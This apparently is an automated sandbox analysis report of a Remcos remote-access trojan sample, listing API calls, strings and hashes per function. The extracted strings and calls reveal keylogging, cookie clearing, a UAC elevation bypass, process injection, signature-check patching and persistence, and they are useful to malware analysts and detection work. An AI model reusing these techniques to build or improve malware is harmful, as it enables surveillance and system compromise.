• Instruction Fuzzy Hash: 5991C275B16368AFC700EF35CCB091E7AAEEB50218B40052EF98697290DE31BC44CBE5
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32 ref: 15692106
  • Part of subcall function 15693877: RegCreateKeyA.ADVAPI32(80000001,00000000,156E60A4), ref: 15693885
  • Part of subcall function 15693877: RegSetValueExA.ADVAPI32(156E60A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,1568C152,156E6C48,00000001,000000AF,156E60A4), ref: 156938A0
  • Part of subcall function 15693877: RegCloseKey.ADVAPI32(156E60A4,?,?,?,1568C152,156E6C48,00000001,000000AF,156E60A4), ref: 156938AB
• OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 15692146
• CloseHandle.KERNEL32(00000000), ref: 15692155
• CreateThread.KERNEL32(00000000,00000000,156927EE,00000000,00000000,00000000), ref: 156921AB
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 1569241A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
• String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
• API String ID: 3018269243-13974260
• Opcode ID: e970a2b13adfcd1686a416165a36ae352e0b541c96d5438112ca04c0fc6ba9f4
• Instruction ID: fbce2bc6649d2bfc1b88718711c370d7274bdee7a065e26f9156f8687d9e8ad5
• Opcode Fuzzy Hash: e970a2b13adfcd1686a416165a36ae352e0b541c96d5438112ca04c0fc6ba9f4
• Instruction Fuzzy Hash: 1671937970A3019BD718EB74CC558BE77E9AF91210F400A2DF48697194EF34B909CBEA
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,02DE7338,02DE0000,02E0B790), ref: 02DE58E9
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02DE5900
• lstrcpynA.KERNEL32(?,?,?), ref: 02DE5930
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02DE7338,02DE0000,02E0B790), ref: 02DE5994
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02DE7338,02DE0000,02E0B790), ref: 02DE59CA
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02DE7338,02DE0000,02E0B790), ref: 02DE59DD
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DE7338,02DE0000,02E0B790), ref: 02DE59EF
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DE7338,02DE0000,02E0B790), ref: 02DE59FB
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DE7338,02DE0000), ref: 02DE5A2F
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02DE7338), ref: 02DE5A3B
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02DE5A5D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameA$\$kernel32.dll
• API String ID: 3245196872-1565342463
• Opcode ID: b115bd44e217673edf522eaec0e4bd0f337cf630d3c22a8adfffb5473bfffcab
• Instruction ID: 633f6768157c12ff63648cb882788f4df522b7cfa04198c8b51286ef517db151
• Opcode Fuzzy Hash: b115bd44e217673edf522eaec0e4bd0f337cf630d3c22a8adfffb5473bfffcab
• Instruction Fuzzy Hash: 0E414F72E00619ABDF10EAE8DC88ADEB7ADEF08398F4445A5A14AD7340D770DF448F64
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 1568BDAF
• FindClose.KERNEL32(00000000), ref: 1568BDC9
• FindNextFileA.KERNEL32(00000000,?), ref: 1568BE89
• FindClose.KERNEL32(00000000), ref: 1568BEAF
• FindClose.KERNEL32(00000000), ref: 1568BED0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Find$Close$File$FirstNext
• String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 3527384056-432212279
• Opcode ID: 56e465f3a01e5402d9dcf0f8347d3953ccdff12fb731a40586dca4ecf506b182
• Instruction ID: 5974bc28205ffc2d6dbbb194fee471e5a6e54974ee9b5c5b74148bdd29a738d7
• Opcode Fuzzy Hash: 56e465f3a01e5402d9dcf0f8347d3953ccdff12fb731a40586dca4ecf506b182
• Instruction Fuzzy Hash: 64419135E12329AEDB14E7B4DC98CEEB779EF11210F400619E906A3590EF307A45CBE5
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 15693417
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 15693425
• GetFileSize.KERNEL32(?,00000000), ref: 15693432
• UnmapViewOfFile.KERNEL32(00000000), ref: 15693452
• CloseHandle.KERNEL32(00000000), ref: 1569345F
• CloseHandle.KERNEL32(?), ref: 15693465
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: File$CloseHandleView$CreateMappingSizeUnmap
• String ID:
• API String ID: 297527592-0
• Opcode ID: ce77e430f725d56977271d68f44394684c3007d894a78185b10eab211fc568cc
• Instruction ID: a2e9d53f33687ec66a437a0a7979589f2818cf67ae6e0f7065270d96f59d13df
• Opcode Fuzzy Hash: ce77e430f725d56977271d68f44394684c3007d894a78185b10eab211fc568cc
• Instruction Fuzzy Hash: BD41CB31748245BFE7219B29DC89F1B7AADEF85724F100A19FA48D60A0DF74E900C7E6
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,156F50E4,?,156F5338), ref: 1568F48E
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1568F4B9
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 1568F4D5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 1568F554
• CloseHandle.KERNEL32(00000000,?,00000000,?,?,156F5338), ref: 1568F563
  • Part of subcall function 1569C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 1569C1F5
  • Part of subcall function 1569C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 1569C208
• CloseHandle.KERNEL32(00000000,?,156F5338), ref: 1568F66E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
• API String ID: 3756808967-1743721670
• Opcode ID: 0a50b4774f186962121b8b30dc6d71d6cdf771fe5f2b3b7b50d37fec1d723de2
• Instruction ID: 5beb5d3ae32a921162dda99cd41ee640ee1a5b02b8891b359fba0d647585ed98
• Opcode Fuzzy Hash: 0a50b4774f186962121b8b30dc6d71d6cdf771fe5f2b3b7b50d37fec1d723de2
• Instruction Fuzzy Hash: 4F714C7461A3419BC714DF20D8A0DAEB7E9BF95240F80092DF596432A0EF34B94DCBDA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
• Opcode ID: 0cf6f965b61210f83f0dad7356598c4680ac05aa912f0e8c040c0ecf77f2048c
• Instruction ID: 580b719c9b5fd68ad825a6b6f7b52dcc8081026a454747e9db232a57e71450cb
• Opcode Fuzzy Hash: 0cf6f965b61210f83f0dad7356598c4680ac05aa912f0e8c040c0ecf77f2048c
• Instruction Fuzzy Hash: E8719E7860A302AFD308CF20D890FAABBA4AF95610F44491DF592576D4EB74BB48C7D6
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcslen.LIBCMT ref: 15687521
• CoGetObject.OLE32(?,00000024,156E6518,00000000), ref: 15687582
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Object_wcslen
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• API String ID: 240030777-3166923314
• Opcode ID: e0a3ffd124604b9d04d0268ac4fbcf03b91781677fe593f46520b68889394343
• Instruction ID: f70d2308310d6bc964f86df04ed176dbb4f362d27d4cf0eb30a9f1c5dcfe6f2b
• Opcode Fuzzy Hash: e0a3ffd124604b9d04d0268ac4fbcf03b91781677fe593f46520b68889394343
• Instruction Fuzzy Hash: 0011C676A03218ABD720DA94EC58ADEB7BCEB04320F000155E814A3140EA75BE44C6F5
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,156F58E8), ref: 1569A75E
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 1569A7AD
• GetLastError.KERNEL32 ref: 1569A7BB
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 1569A7F3
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
• Opcode ID: f4ae9ba91ef2044fcb7cda5f8be766d15014f82512f448825b8e030e9b913a1c
• Instruction ID: 8634af320181cbdad6a5ade96208094cb649e140fc3a6d5c5ccffc42a9992f3e
• Opcode Fuzzy Hash: f4ae9ba91ef2044fcb7cda5f8be766d15014f82512f448825b8e030e9b913a1c
• Instruction Fuzzy Hash: 1B81357520A304AFC714EB60D894DAFB7E9FF94214F50491EF58682260EF70BA09CBD6
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DE5BAC
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02DE5BB9
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02DE5BBF
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02DE5BEA
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DE5C31
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DE5C41
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DE5C69
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DE5C79
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02DE5C9F
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02DE5CAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
• Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
• Instruction ID: 6ce056a6ca20ae6e9988e3e3fffe87fe284b4e0a7d090a34fd1409f35c43eb9d
• Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
• Instruction Fuzzy Hash: 6D3164B1F4011D2AEF25E6B4DC46BDE77AD8B043C8F4445A1964AE6281DA74DE84CF60
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 1568C39B
• FindNextFileW.KERNEL32(00000000,?), ref: 1568C46E
• FindClose.KERNEL32(00000000), ref: 1568C47D
• FindClose.KERNEL32(00000000), ref: 1568C4A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 1164774033-405221262
• Opcode ID: 3627a1a8b6e1f7b0ba90afc2005077c1b34e6975c02d16c43a616caa885144bb
• Instruction ID: 0e14cea9da926215b148fca221c9c5d0b49dbe347e1984d01bbb05174615caf0
• Opcode Fuzzy Hash: 3627a1a8b6e1f7b0ba90afc2005077c1b34e6975c02d16c43a616caa885144bb
• Instruction Fuzzy Hash: D7318135A163199ADB14E7B0DC94DFDB7B9AF10611F000219E406A6194FF34BA8ACBD8
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 1568A2D3
• SetWindowsHookExA.USER32(0000000D,1568A2A4,00000000), ref: 1568A2E1
• GetLastError.KERNEL32 ref: 1568A2ED
  • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1568A33B
• TranslateMessage.USER32(?), ref: 1568A34A
• DispatchMessageA.USER32(?), ref: 1568A355
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error $`Wu
• API String ID: 3219506041-303027793
• Opcode ID: 73ac6fbc1447ed803193523e9425e8109726e2b33c57f01cf561e217cfae1621
• Instruction ID: 294135d78019219b500e7c2988ed090711bff06634d8978b695eec12286401fe
• Opcode Fuzzy Hash: 73ac6fbc1447ed803193523e9425e8109726e2b33c57f01cf561e217cfae1621
• Instruction Fuzzy Hash: C9119E71A25355ABC710AF759C4986F77EDEB95631B404A2DFCC6C2580EF70A500CBE2
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,156F4EE0,?), ref: 1569C2EC
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,156F4EE0,?), ref: 1569C31C
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,156F4EE0,?), ref: 1569C38E
• DeleteFileW.KERNEL32(?,?,?,?,?,?,156F4EE0,?), ref: 1569C39B
  • Part of subcall function 1569C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,156F4EE0,?), ref: 1569C371
• GetLastError.KERNEL32(?,?,?,?,?,156F4EE0,?), ref: 1569C3BC
• FindClose.KERNEL32(00000000,?,?,?,?,?,156F4EE0,?), ref: 1569C3D2
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,156F4EE0,?), ref: 1569C3D9
• FindClose.KERNEL32(00000000,?,?,?,?,?,156F4EE0,?), ref: 1569C3E2
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID:
• API String ID: 2341273852-0
• Opcode ID: e9b6dd60e8ce79dbea7926c77c210222cc8d736e8b5525c7570b64925c2837bc
• Instruction ID: 72ae7c700e7caa25d8a5b5d09b59d0011caae568d03fd1799f61acdea4947676
• Opcode Fuzzy Hash: e9b6dd60e8ce79dbea7926c77c210222cc8d736e8b5525c7570b64925c2837bc
• Instruction Fuzzy Hash: 6E319472D1622C9EEB64D6B0CC88EDBB77DAF05210F4005A9E595D3050EF71AAC4CBE4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetForegroundWindow.USER32 ref: 1568A416
• GetWindowThreadProcessId.USER32(00000000,?), ref: 1568A422
• GetKeyboardLayout.USER32(00000000), ref: 1568A429
• GetKeyState.USER32(00000010), ref: 1568A433
• GetKeyboardState.USER32(?), ref: 1568A43E
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 1568A461
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 1568A4C1
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 1568A4FA
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID:
• API String ID: 1888522110-0
• Opcode ID: fc2bb577e35b427f2ad09be9a3bf833a05f938b2432bc6321c911638d2bc9eab
• Instruction ID: 34692b70177bda607174dfacb896bfef0a7f3f63ee925554452d43417c29c038
• Opcode Fuzzy Hash: fc2bb577e35b427f2ad09be9a3bf833a05f938b2432bc6321c911638d2bc9eab
• Instruction Fuzzy Hash: 0D315372514318BFD710DAA4CC84F9B77ECEB48754F01092EFA4586190EBB1A958CBD1
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1569409D
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 156940A9
  • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 1569426A
• GetProcAddress.KERNEL32(00000000), ref: 15694271
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: AddressCloseCreateLibraryLoadProcsend
• String ID: SHDeleteKeyW$Shlwapi.dll
• API String ID: 2127411465-314212984
• Opcode ID: 53492c655cc12d5c972f98d012723481f796b577a0b297cb5581f89e3e3a6a31
• Instruction ID: 328b08d044932d610580030d481f03e12f7dfd768ed6cffc57c2910fae5da924
• Opcode Fuzzy Hash: 53492c655cc12d5c972f98d012723481f796b577a0b297cb5581f89e3e3a6a31
• Instruction Fuzzy Hash: DFB1EA79B06304ABCA18FB74DC69CAF76A9AF91551F80061CF543971D0EE70BA08C3DA
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 156C9212
• _free.LIBCMT ref: 156C9236
• _free.LIBCMT ref: 156C93BD
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,156DF234), ref: 156C93CF
• WideCharToMultiByte.KERNEL32(00000000,00000000,156F2764,000000FF,00000000,0000003F,00000000,?,?), ref: 156C9447
• WideCharToMultiByte.KERNEL32(00000000,00000000,156F27B8,000000FF,?,0000003F,00000000,?), ref: 156C9474
• _free.LIBCMT ref: 156C9589
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
• Opcode ID: 990dd7332bf758cc1c05586778c1319dd35a741cf6021583be6bef1652e4adaf
• Instruction ID: c9d96bb7077e7320a9875ee30abe692ae7cd66fc3713d663c62deea97177b1b8
• Opcode Fuzzy Hash: 990dd7332bf758cc1c05586778c1319dd35a741cf6021583be6bef1652e4adaf
• Instruction Fuzzy Hash: 06C15975E04259ABDB10CF78CC90A9EBBB9FF46220F1441DED89597680EB34BA01CBD4
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(bcrypt,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,00000000,02E453DC,ScanString,02E45360,02DF9A30), ref: 02DF7AD2
• GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DF7ADF
• NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360,02DF9A30,UacInitialize), ref: 02DF7AF6
• FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,00000000,02E453DC), ref: 02DF7B05
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
• String ID: BCryptVerifySignature$bcrypt
• API String ID: 1002360270-4067648912
• Opcode ID: d2a3008a50399d88397a102e4969a90be7e333f7e414e1e715cc2db803d12723
• Instruction ID: b3912bed1410f6b0adaaa0e87577b7ff9f18202dc9aa8d11e67660f4d5b125b8
• Opcode Fuzzy Hash: d2a3008a50399d88397a102e4969a90be7e333f7e414e1e715cc2db803d12723
• Instruction Fuzzy Hash: 35F0E2B26093543EEA61A2285C80EFFA29DCBC37B0F05466DFA5496380DB61CC04C3F5
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 1569795F
• OpenProcessToken.ADVAPI32(00000000), ref: 15697966
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 15697978
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 15697997
• GetLastError.KERNEL32 ref: 1569799D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543
• Opcode ID: 07389581c53ea89274bec6fb1714d85ec9a9121d333c0b796cc68da487866438
• Instruction ID: 5e7f70e0009f7d0ef0d2f35df2697fe3bbe4da42eec4296a7d7eb2e5123f04c4
• Opcode Fuzzy Hash: 07389581c53ea89274bec6fb1714d85ec9a9121d333c0b796cc68da487866438
• Instruction Fuzzy Hash: B3F0DA7181212DABDB10ABA1DD8DEEF7FBDEF05225F110558FD45A1144DB344A04CAF1
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
